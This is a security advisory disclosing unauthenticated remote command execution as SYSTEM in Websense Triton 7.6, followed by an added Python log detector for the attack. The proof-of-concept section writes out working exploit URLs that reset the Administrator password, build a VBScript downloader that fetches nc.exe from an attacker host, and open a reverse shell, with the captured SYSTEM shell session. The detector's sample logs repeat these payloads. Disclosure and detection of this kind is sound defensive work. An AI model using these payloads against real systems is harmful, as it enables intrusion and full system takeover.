NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTEM
=======
Summary
=======
Name: Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
Release Date: 30 April 2012
Reference: NGS00140
Discoverer: Ben Williams <ben.williams (at) ngssecure (dot) com [email concealed]>
Vendor: Websense
Vendor Reference:
Systems Affected:
Risk: Critical
Status: Published
========
TimeLine
========
Discovered: 1 November 2011
Released: 2 November 2011
Approved: 2 November 2011
Reported: 2 November 2011
Fixed: 2 December 2011
Published: 30 April 2012
===========
Description
===========
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
Websense is one of the world's best known web-filter products.
Websense (Triton 7.6) is vulnerable to unauthenticated remote command execution as SYSTEM.
This is exploitable via a crafted URL.
There is some character filtering and substitution in the URL (possibly because this is OS command injection via Perl injection), but it can be worked around to create, delete or modify files, run commands, and ultimately control the system.
Many commands can be delivered in a single GET request, so an external attacker could get a reverse-shell payload delivered via CSRF through any internal user, as long as they can find the proxy address in advance (or guess which subnet it is in).
=================
Technical Details
=================
I. VULNERABILITY
-------------------------
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
II. BACKGROUND
-------------------------
Websense is one of the world's best known web-filter products.
The "Triton" administrative UI allows administration of multiple Websense solutions, including their Email, Web, and DLP products.
http://www.websense.com/
III. DESCRIPTION
-------------------------
Websense (Triton 7.6) is prone to Unauthenticated remote command execution as SYSTEM.
IV. PROOF OF CONCEPT
-------------------------
Affected URL: https://192.168.233.30:9443/explorer_wse/ws_irpt.exe (though there could be other potential vectors for introducing executed instructions)
Example which changes the Windows Administrator account password to "blah":
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|
This could be very dangerous if the attacker is internal. Other options are available to external attackers such as uploading and running a reverse shell via CSRF.
This can be done by 1) creating a VBScript downloader application which downloads nc.exe:
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26echo strUrl %3d ^"http:^" %2b chr(47) %2b chr(47) %2b ^"192.168.233.11^" %2b chr(47) %2b ^"nc.exe^"> http.vbs%26echo StrFile %3d ^"nc.exe^" >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DEFAULT %3d 0 >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG %3d 0 >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DIRECT %3d 1 >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PROXY %3d 2 >> http.vbs%26echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> http.vbs%26echo Err.Clear >> http.vbs%26echo Set http %3d Nothing >> http.vbs%26echo Set http %3d CreateObject(^"WinHttp.WinHttpRequest.5.1^") >> http.vbs%26echo If http Is Nothing Then Set http %3d CreateObject(^"WinHttp.WinHttpRequest^") >> http.vbs%26echo If http Is Nothing Then Set http %3d CreateObject(^"MSXML2.ServerXMLHTTP^") >> http.vbs%26echo If http Is Nothing Then Set http %3d CreateObject(^"Microsoft.XMLHTTP^") >> http.vbs%26echo http.Open ^"GET^", strURL, False >> http.vbs%26echo http.Send >> http.vbs%26echo varByteArray %3d http.ResponseBody >> http.vbs%26echo Set http %3d Nothing >> http.vbs%26echo Set fs %3d CreateObject(^"Scripting.FileSystemObject^") >> http.vbs%26echo Set ts %3d fs.CreateTextFile(StrFile, True) >> http.vbs%26echo strData %3d ^"^" >> http.vbs%26echo strBuffer %3d ^"^" >> http.vbs%26echo For lngCounter %3d 0 to UBound(varByteArray) >> http.vbs%26echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter %2b 1, 1))) >> http.vbs%26echo Next >> http.vbs%26echo ts.Close >> http.vbs%26http.vbs|
2) Running nc.exe:
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26nc.exe 192.168.233.11 443 -e cmd.exe|
3) Remote SYSTEM shell on the attacker's system:
nc -lvvp 443
listening on [any] 443 ...
192.168.233.30: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.233.11] from (UNKNOWN) [192.168.233.30] 2828
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Websense\Web Security\webroot\Explorer>whoami
whoami
nt authority\system
C:\Program Files\Websense\Web Security\webroot\Explorer>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4CA0-BB76
Directory of C:\Program Files\Websense\Web Security\webroot\Explorer
11/02/2011 11:53 AM <DIR> .
11/02/2011 11:53 AM <DIR> ..
07/14/2011 11:37 PM 2,529 batchchart.jar
07/14/2011 11:37 PM 3,819 body_components.css
07/14/2011 11:36 PM 3,776,598 cal_legend.exe
07/14/2011 11:37 PM 16,374 catcolors.txt
...etc...
As multiple instructions can be delivered in a single GET request, it should be easy to launch this attack via CSRF. Because every internal user goes via the proxy, the attack can be launched through any internal user who clicks on the malicious link or visits the attacker's site containing a crafted IMG tag.
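The PoC URLs above and the CSRF delivery paragraph give a defender two concrete things to look for in the proxy's own access logs: a request to ws_irpt.exe whose SendFile value decodes to something containing shell metacharacters or command names, and such a request arriving with a third-party Referer (the IMG-tag or link delivery route). The following detector is an added example written for this advisory; it is not NGS Secure's or Websense's code. The Apache combined-style log layout, the sample lines, the command-token list and the trusted-host set are all constructed assumptions to be adapted to the real log format in use.

```python
"""Spot NGS00140-style command injection against the Websense Triton 7.6
ws_irpt.exe endpoint in web-access logs.

Added example, not part of the NGS advisory and not Websense code. The log
format (Apache combined style), the sample lines and the trusted-host set are
constructed assumptions; adapt LOG_RE to your proxy or IIS log layout.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Vulnerable path from the advisory; the injection rides in the SendFile value.
TARGET_PATH = "/explorer_wse/ws_irpt.exe"
SUSPECT_PARAM = "sendfile"
# Metacharacters that have no business in a file-name argument.
SHELL_META = re.compile(r"[&|;><`$]")
# Tokens taken from the advisory's payloads plus common follow-on tooling (assumed list).
COMMAND_TOKENS = ("net user", "nc.exe", "cmd.exe", "http.vbs", "cscript", "powershell")
# Assumption: the Triton host itself. A Referer from anywhere else means the
# request was triggered from a third-party page, i.e. the CSRF delivery path.
TRUSTED_REFERER_HOSTS = {"192.168.233.30"}

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample traffic (not real logs): one benign download, two
# injection attempts modelled on the advisory's PoC URLs, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Nov/2011:11:53:01 +0000] "GET /explorer_wse/ws_irpt.exe?&SendFile=report.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Nov/2011:11:53:09 +0000] "GET /explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net%20user%20administrator%20blah| HTTP/1.1" 200 17 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Nov/2011:11:53:12 +0000] "GET /explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26nc.exe%20192.168.233.11%20443%20-e%20cmd.exe| HTTP/1.1" 200 0 "http://evil.example/" "Mozilla/5.0"
10.0.0.9 - - [02/Nov/2011:11:54:00 +0000] "GET /explorer_wse/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def decode_sendfile(url: str) -> Optional[str]:
    """Return the fully decoded SendFile value of a ws_irpt.exe request, else None."""
    parts = urlsplit(url)
    if parts.path.lower() != TARGET_PATH:
        return None
    for key, vals in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() == SUSPECT_PARAM and vals:
            # parse_qs decodes once; a second unquote catches double encoding.
            return unquote(vals[0])
    return None


def classify(url: str, referer: str = "-") -> List[str]:
    """Return the reasons a request looks like exploitation (empty if clean)."""
    value = decode_sendfile(url)
    if value is None:
        return []
    reasons = []
    if SHELL_META.search(value):
        reasons.append("shell metacharacter in SendFile")
    lowered = value.lower()
    tokens = [t for t in COMMAND_TOKENS if t in lowered]
    if tokens:
        reasons.append("command token in SendFile: " + ", ".join(tokens))
    host = urlsplit(referer).hostname if referer not in ("", "-") else None
    if host and host not in TRUSTED_REFERER_HOSTS:
        reasons.append(f"cross-site Referer {host} (possible CSRF delivery)")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse combined-format lines and return only the flagged requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["url"], m["referer"])
        if reasons:
            hits.append({"src": m["src"], "ts": m["ts"], "url": m["url"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["src"]} {hit["url"]}')
        for reason in hit["reasons"]:
            print("   -", reason)
```

Run against the constructed sample, the two PoC-shaped lines are flagged and the benign download and unrelated page are not. The Referer check is deliberately scoped to the vulnerable path only, so it stays quiet elsewhere; note that a browser loading the crafted IMG tag sends the attacker page as Referer, which is why the third line gains the CSRF reason on top of the injection markers, and that absent Referer headers (shown as "-") are not treated as evidence either way.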
===============
Fix Information
===============
This issue is addressed in Hotfix 24, which can be downloaded at:
https://www.websense.com/content/mywebsense-hotfixes.aspx
NGS Secure Research
http://www.ngssecure.com